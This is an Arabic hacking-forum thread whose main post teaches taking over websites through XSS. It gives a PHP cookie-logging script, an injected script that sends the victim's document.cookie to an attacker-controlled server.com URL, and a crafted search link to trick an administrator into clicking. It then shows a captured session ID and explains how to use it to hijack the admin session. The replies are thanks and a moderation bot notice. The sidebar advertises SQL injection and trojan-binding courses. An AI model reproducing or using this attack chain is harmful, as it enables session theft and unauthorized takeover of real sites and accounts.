1. المٌقدمة الأولي :دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    تٌعد ثغرات حقن قواعد البينات الثغرة رقم واحد فى العالم والمصنفة تحت بند الإخطر
    والفريق التابع له بإختراق أكبر المواقع الصهيونية قرائة الموضوع
  2. المٌقدمة الثانية : دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    في هذه المٌثقدمة الثانية والأخيرة سوف نتعرف على قواعد علم حقن قواعد البيانات
    حتى يتثنى لنا علم يٌساعدنا على القيام بعمليات الحقن بالطرق الصحيحه قرائة الموضوع
  3. دورة كشف دمج والتلغيم حصريا على أرض عراق تيم(2017)
    بعد ماقمت بعمل دورة الكشف دمج والتلغيم وستكملت الدوره وتحتوي على 12 درس
    كانت دروس حصريا على عراق تيم وشرح واضح جدا ومفهوم الى المبتدأ والى المبدع قرائة الموضوع

[ شرح ] اختراق الموقع عن طريق تغرة اكس اس اس (xss)

الموضوع في 'آمن المواقع والسيرفرات' بواسطة ś‡òÞ Ħąć, بتاريخ ‏23 ابريل 2013.

كاتب الموضوع : ś‡òÞ Ħąć المشاهدات : 2,362 الردود : 4 ‏23 ابريل 2013
حالة الموضوع:
مغلق
  1. غير متصل

    ś‡òÞ Ħąć
    rankrank
    Developer

    عضو منذ:
    ‏20 مارس 2013
    عدد المشاركات:
    الإعجابات المتلقاة:
    5
    نقاط الجائزة:

    بسم الله الرحمن الرحيم

    شرح اختراق الموقع عن طريق تغرة اكس اس اس (xss)

    الثغره هده منتشرة مثل تغرة السكيل بل تعتبر من تغرات الحقن

    الطريقة تعتمد على سرقة الكوكيز الخاصة بالادمن والدخول للوحة

    طبعا الكل يعرف كيف يتأكد من ان الموقع مصاب بالتغرة
    غالبا تضع في الرابط او في مكان البحث الكود التالي

    كود:
    ><script>alert("test")</script>
    وطبعا في بعض الاحيان تحتاج الى تشفير الامر بالهيكس
    والمواقع موجودة لتشفير بالهيكس
    ^_^
    الطريقة تحتاج الى ثلاثة اشياء
    ان يسمح الموقع المصاب بتسجيل الاعضاء + ملف بي اتش بي مرفوع على اي موقع + ملف تكست فارغ باسم
    log.txt (تقوم برفعه مع ملف البي اتش بي)
    طبعا بعد التسجيل في الموقع
    ندخل بالعضوية الخاصة فينا
    ونقوم برفع الملف التالي من شل او استضافة تدعم رفع ملفات البي اتش بي

    هذا هو الملف

    كود PHP:
    <?php 

    function GetIP() 

        if (
    getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown")) 
            
    $ip getenv("HTTP_CLIENT_IP"); 
        else if (
    getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown")) 
            
    $ip getenv("HTTP_X_FORWARDED_FOR"); 
        else if (
    getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown")) 
            
    $ip getenv("REMOTE_ADDR"); 
        else if (isset(
    $_SERVER['REMOTE_ADDR']) &&  $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'],  "unknown")) 
            
    $ip $_SERVER['REMOTE_ADDR']; 
        else 
            
    $ip "unknown"
        return(
    $ip); 


    function 
    logData() 

        
    $ipLog="log.txt"
        
    $cookie $_SERVER['QUERY_STRING']; 
        
    $register_globals = (bool) ini_get('register_gobals'); 
        if (
    $register_globals$ip getenv('REMOTE_ADDR'); 
        else 
    $ip GetIP(); 

        
    $rem_port $_SERVER['REMOTE_PORT']; 
        
    $user_agent $_SERVER['HTTP_USER_AGENT']; 
        
    $rqst_method $_SERVER['METHOD']; 
        
    $rem_host $_SERVER['REMOTE_HOST']; 
        
    $referer $_SERVER['HTTP_REFERER']; 
        
    $date=date ("l dS of F Y h:i:s A"); 
        
    $log=fopen("$ipLog""a+"); 

        if (
    preg_match("/\bhtm\b/i"$ipLog) || preg_match("/\bhtml\b/i"$ipLog)) 
            
    fputs($log"IP: $ip | PORT: $rem_port | HOST: $rem_host |  Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : }  $date | COOKIE:  $cookie <br>"); 
        else 
            
    fputs($log"IP: $ip | PORT: $rem_port | HOST: $rem_host |   Agent: $user_agent | METHOD: $rqst_method | REF: $referer |  DATE:  $date | COOKIE:  $cookie \n\n"); 
        
    fclose($log); 


    logData(); 

    ?>
    اوك الان رفعنا الملف على موقع مثلا
    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]

    وهذا ملف اللوغ
    htp://server.com/log.txt
    والموقع المصاب هو
    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]


    الان كل شيئ جهاز بقى فقط كود الحقن

    كود:
    "><script language=  "JavaScript">document.location="http://server.com/file.php?cookie=" +   document.cookie;document.location="http://www.target.com"</script>
    الان طريقة الاختراق تعتمد على ارسال كود الحقن الى الادمن (الكود الاخير)
    طبعا في رسالة او على الاميل او اي شيئ
    المهم لازم يضغط كليك على الرابط اللي سيكون في النهاية

    كود:
    http://target.com/search.php?q="><script language=  "JavaScript">document.location="http://yoursite.com/whateveryouwant.php?cookie="  +  document.cookie;document.location="http://www.whateversite.com"</script>
    تضع فقط كود الحقن بعد رابط الملف المصاب في الموقع وترسله الى الادمن
    لما يدخل الادمن على الرابط ستجد الكوكيز في ملف اللوع log.txt اللي رفعنا مع ملف البي اتش بي
    http:server.com/log.txt

    مثال

    كود:
    IP: xxx.xxx.xxx.xx| PORT: xxx| HOST:  |  Agent: Mozilla/5.0 (X11; U;  Linux i686; en-US; rv:1.9.0.8) Gecko/2009032711 Ubuntu/8.10 (intrepid)  Firefox/3.0.8 | METHOD:  | REF: http://target.com/search.php |  
    
    DATE: Tuesday 9th 2013f April 2013 05:04:07 PM | COOKIE:  cookie=PHPSESSID=889c6594db2541db1666cefca7537373
    طبعا اللي يهمنا في اللوغ هو
    PHPSESSID=889c6594db2541db1666cefca7537373
    السيشن اي دي
    ومن خلالها نعدل على الكوكيز الخاص فينا باستعمال احدى ادوات تعديل الكوكيز
    وبمجرد عمل رفريش تجد نفسك ادمن#:"

     


    جاري تحميل الصفحة...
  2. غير متصل

    روبورت1 <img src="http://im34.gulfup.com/s2o63.gif"><br>فر

    عضو منذ:
    ‏8 نوفمبر 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    عزيزي الكاتب ، شكراً لك على الإفادة في المنتدى بإضافة مادّة علمية جديدة إليه
    كتب الله لك أجر كل من استفاد منها.

    * تنبيه للأعضاء والزوّار ، نتمنّى عدم دخول أيّة روابط خارجيّة أو تحميل أي مرفق موجود بالموضوع
    حتى يتم تأكيد سلامة المحتوى برد من قبل أحد أعضاء فريق الفحص أو مشرف القسم.

    هذه العضوية آليّة ، غير مُدارة من قبل أي عُنصر بشري ، إنما مبرمجة لتقوم ببعض أعمال التنظيم والمتابعة في المنتدى.

     


  3. غير متصل

    ŦђĘ βě$Ţ
    Developer

    عضو منذ:
    ‏4 مارس 2013
    عدد المشاركات:
    الإعجابات المتلقاة:
    4
    نقاط الجائزة:

    رد: اختراق الموقع عن طريق تغرة اكس اس اس (xss)

    وعليكم السلام ورحمة الله

    بارك الله فيك اخي على الشرح المميز ​
     


  4. غير متصل

    ÍяâΘ
    rankrank
    Developer

    عضو منذ:
    ‏30 نوفمبر 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الإقامة:

    رد: اختراق الموقع عن طريق تغرة اكس اس اس (xss)

    وِعليّكم آلسًسًسًلآم وِرحًمة ٱللۂ وِبّركـآتُۂ

    يّعطٌيّك آلعـآفُيّۂ آخٌيّ

    فُيّ آمـآنٌ ٱللۂ
     


  5. غير متصل

    言う者
    rankrank
    ExpErt DeveloPer

    عضو منذ:
    ‏7 مارس 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الإقامة:

    رد: اختراق الموقع عن طريق تغرة اكس اس اس (xss)

    مبدع كعادتكـ

    الله يعطيك العافيه
     


حالة الموضوع:
مغلق

مشاركة هذه الصفحة

جاري تحميل الصفحة...